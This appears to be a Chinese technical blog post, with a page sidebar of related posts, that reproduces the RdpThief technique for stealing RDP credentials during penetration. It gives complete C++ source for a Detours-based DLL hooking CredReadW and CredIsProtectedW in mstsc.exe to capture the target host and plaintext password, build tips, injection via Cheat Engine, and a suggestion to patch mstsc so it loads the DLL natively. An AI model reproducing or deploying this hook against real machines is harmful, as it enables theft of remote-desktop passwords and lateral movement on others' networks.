php 验证rdp密码,获取RDP连接中密码的方法

最新推荐文章于 2023-11-13 18:40:12 发布
最新推荐文章于 2023-11-13 18:40:12 发布
阅读量286 收藏
点赞数
文章标签: php 验证rdp密码

前言

渗透过程中,当发现RDP连接中有记录,但密码未保存,可通过HOOK方式截取明文密码,参考RdpThief,本文是一篇利用复现。

实践

系统

windows 7 32-

将API Monitor,附加选择mstsc进程,如图所示:

dfba13d57fee

监听RDP进程

RDP点击连接,并查看API Monitor列表

dfba13d57fee

RDP连接

如果未监听到,请在左侧API帅选器中勾选如图

dfba13d57fee

抓取RDP调用API过程

可以看到,连接IP出现在CredReadW的调用中,直接HOOK这个位置就可以获取连接IP,方法很多可以E语言实现比较简单,这里我们参考RdpThief源码,使用Detours

框架来实现HOOK。

dfba13d57fee

Detours目录

首先编译框架,利用VS自带工具VsDevCmd.bat,cd到Detours的src目录

使用nmake命令编译,并安装框架

dfba13d57fee

编译安装框架

dfba13d57fee

代码

这里直接使用MessageBoxW将HOOK的结果弹出,查看效果。

#include "stdafx.h"

#include

#include

#include

#include

#include

#include

#define SECURITY_WIN32

#include

#pragma comment(lib, "crypt32.lib")

#pragma comment(lib, "Advapi32.lib")

#pragma comment(lib, "Secur32.lib")

static BOOL(WINAPI *OriginalCredReadW)(LPCWSTR TargetName, DWORD Type, DWORD Flags, PCREDENTIALW *Credential) = CredReadW;

BOOL HookedCredReadW(LPCWSTR TargetName, DWORD Type, DWORD Flags, PCREDENTIALW *Credential)

{

MessageBoxW(NULL, TargetName,L"Hostname",0);

return OriginalCredReadW(TargetName, Type, Flags, Credential);

}

static BOOL(WINAPI *OriginalCredIsProtectedW)(LPWSTR pszProtectedCredentials, CRED_PROTECTION_TYPE *pProtectionType) = CredIsProtectedW;

BOOL HookedCredIsProtectedW(LPWSTR pszProtectedCredentials, CRED_PROTECTION_TYPE *pProtectionType)

{

MessageBoxW(NULL, pszProtectedCredentials, L"Password", 0);

return OriginalCredIsProtectedW(pszProtectedCredentials, pProtectionType);

}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved)

{

if (DetourIsHelperProcess()) {

return TRUE;

}

if (dwReason == DLL_PROCESS_ATTACH) {

DetourRestoreAfterWith();

DetourTransactionBegin();

DetourUpdateThread(GetCurrentThread());

DetourAttach(&(PVOID&)OriginalCredReadW, HookedCredReadW);

DetourAttach(&(PVOID&)OriginalCredIsProtectedW, HookedCredIsProtectedW);

DetourTransactionCommit();

}

else if (dwReason == DLL_PROCESS_DETACH) {

DetourTransactionBegin();

DetourUpdateThread(GetCurrentThread());

DetourDetach(&(PVOID&)OriginalCredReadW, HookedCredReadW);

DetourDetach(&(PVOID&)OriginalCredIsProtectedW, HookedCredIsProtectedW);

DetourTransactionCommit();

}

return TRUE;

}

这2个坑点,第1需要选择多线程编译模式,第2编译要用Release否则注入后程序会崩溃。

dfba13d57fee

多线程/MT

dfba13d57fee

Release

编译后,使用Cheat Engine将DLL注入mstsc进程,真实项目中,可通过PE修改方式直接使mstsc原生调用DLL。

dfba13d57fee

注入DLL

dfba13d57fee

获取服务器地址

dfba13d57fee

获取服务器密码

参考链接

张梓染Ashley
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-Windows RDP凭证的抓取和密码破解测试的方法
lza20001103的博客
09-02 1485
Windows RDP凭证的抓取和密码破解【密码抓取和爆破】 文章目录Windows RDP凭证的抓取和密码破解【密码抓取和爆破】破解原理凭证的查看查看凭证命令在线破离线破解 破解原理 Credentials的解密是Windows系统信息收集非常重要的一环,其包括各类敏感、重要的凭证 (这个可以理解为密码) , 接下来我们就讲解RDP凭证的抓取和破解。 在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地, 由于Windows还需要解密从而使用,所以这个过程
php rdp 远程桌面连接,linux下使用 FreeRDP 连接 Windows 远程桌面(转)
weixin_26757949的博客
03-12 691
这是一种最简单的使用方法,转载自http://wenzhixin.net.cn/2014/03/16/ubuntu_xfreerdp简介FreeRDP是一款开源的远程桌面系统,支持多种平台, 在 ubuntu 使用 FreeRDP 可以很方便的登录到 windwos 远程桌面。安装sudo apt-get install freerdp使用xfreerdp -f host:port -u u...
[内网]RDP远程桌面密码凭证获取
Keepb1ue的博客
05-15 9937
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey通过Masterkey进行解密,获取明文。
内网渗透 | 最全的内网凭据密码收集方法和技巧总结
Ms08067安全实验室
02-03 6258
内网凭据密码收集指南原创投稿作者:深蓝实验室天威战队前言在攻防场景下,红队人员拿下一台终端或服务器后,第一步要做的往往就是信息收集,为最大化利用权限,扩大战果,密码抓取必不可少,这里针对常见应用软件和系统等密码抓取做了记录和总结,希望能帮助你作为参考。RDP凭证本机RDP密码抓取本机RDP密码是一个我们常遇到的场景,通常使用mimikatz抓取RDP密码。当系统为win10或2012R2以上时,默...
弱口令(Weak Password)总结和爆破工具
热门推荐
博客地址 www.sec0nd.top
09-01 2万+
网站管理、运营人员由于安全意识不足,为了方便、避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等。攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。...
RDP文件密码加密、解密算法.rar
06-03
密码是以密文形式配置在rdp文件的,本程序可以对远程登录的密码进行加密和解密。加密后的密文可以放在rdp配置文件里面,这样就可实现不输入用户密码自动远程登录。 完整的C#代码,vs2008工程,可编译和运行。 ...
RDP终端密码加密_1.0.rar
06-20
远程桌面RDP密码加密解密工具用来生成rdp文件密码的工具,经过测试确实可以将你的密码生成密码,也可以将rdp密码进行解密,如果rdp文件保存不当就是噩梦,建议大家谨慎使用自动登录. 远程桌面通过RDP文件自动...
rdp文件密码的生成
06-02
rdp文件有一行密码说明,利用这个文件可以生成所需要的密码
rdp文件密码加密解密程序
07-27
远程桌面登录或者启动remoteApp程序的rdp文件,可以带用户名密码 username:s:xxxx password 51:b:xxxxx 此工具用于rdp文件密码的加解密
RDP-OTP:Windows远程桌面的一次性密码身份验证
05-16
RDP OTP Windows远程桌面环境的一次性密码身份验证 它是如何工作的? 每次登录到远程桌面环境时,密码都会自动更改。 然后,使用个人RSA密钥对的公共密钥对新密码进行加密。 密钥对的唯一用途是用于发送一次具有更高安全性的密码。 然后,您的加密密码将被编码为QR码图像。 二维码将上传到您选择的任何FTP,WebDAV或网络共享。 然后,即使在不受信任的系统,也可以使用浏览器访问QR码图像。 您的智能手机拥有RSA密钥对的私钥。 因此,它可以从扫描的QR码图像解密您的一次性密码。 您可以从智能手机的屏幕上读取未加密的密码,并使用该密码使用不受信任的系统登录到远程桌面环境。 现在您已经登录,密码已经在后台更改了。 安装步骤 安装 到您的android设备上 在您的android设备上运行app RDP OTP 单击Generate key ,它会生成一个RSA 1024位密
RDP文件密码加解密
12-13
用于远程连接的.rdp文件的password 51:b: 这个设置的明文密码和二进制哈希转换
rdp密码生成工具
09-11
rdp密码加密解密工具
RDP 协议组件 X.224 在协议流发现一个错误并且断了客户端连接的解决方法
01-10
RDP 协议组件 X.224 在协议流发现一个错误并且断了客户端连接。 事件类型: 错误 事件来源: TermDD 描述: RDP 的 “DATA ENCRYPTION” 协议组件在协议流检测到一个错误并且断了客户机。 这里,RDP,即远程...
密码抓取--获取已控机器本地保存的RDP密码
网络安全。
02-24 1万+
0x01 简介 在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。 0x02 获取已控机器本地保存的RDP密码 一、mimikatz 1、查看本地机器本地连接过的目标机器。 reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clie...
获取RDP凭据密码
G3et的博客
02-06 1321
Windows 自带的远程桌面功能非常强大,并且被广泛使用。因此,获取远程桌面凭证可以为渗透测试的横向移动提供有利条件。横向移动是指在已经渗透到网络内部的情况下,继续在网络内部渗透的过程。通过获取远程桌面凭证,攻击者可以在网络内部移动,以获取更高的权限和更多的系统访问权限。所以,在渗透测试获取远程桌面凭证是一个很重要的步骤。如果用户在登录 RDP 时勾选了 “允许为我保存凭证” 选项,则在该用户本地将会生成一个凭证文件。
初步了解爆破(附Burp suite)
small_whitehat的博客
02-08 419
简介爆破
弱口令暴力破解详解(包含工具、字典下载地址)
ran的博客
04-24 1万+
弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能 对你很了解)猜测到或被破解工具破解的口令均为弱口令,通常与管理的安全意识和平台的初始化配置等相关,通过系统弱口令,可被黑客直接获得系统控制权限。在常见的安全测试,弱口令会产生安全的各个领域,包括 Web 应用,安全设备,平台组件,操作系统等;如何获取弱口令,利用弱口令成为了此类安全问题的关键!
内网密码抓取
最新发布
jjjj1029056414的博客
11-13 603
主要抓的内网机器hash明文密码这些
win10 rdp 密码加密工具
07-31
在Win10的RDP密码是通过加密算法进行保护的,以确保数据传输的安全性。具体而言,RDP使用了一种称为ClearText Password Encryption(明文密码加密)的方法来加密密码。这种加密方法基于基于RSA Public Key ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值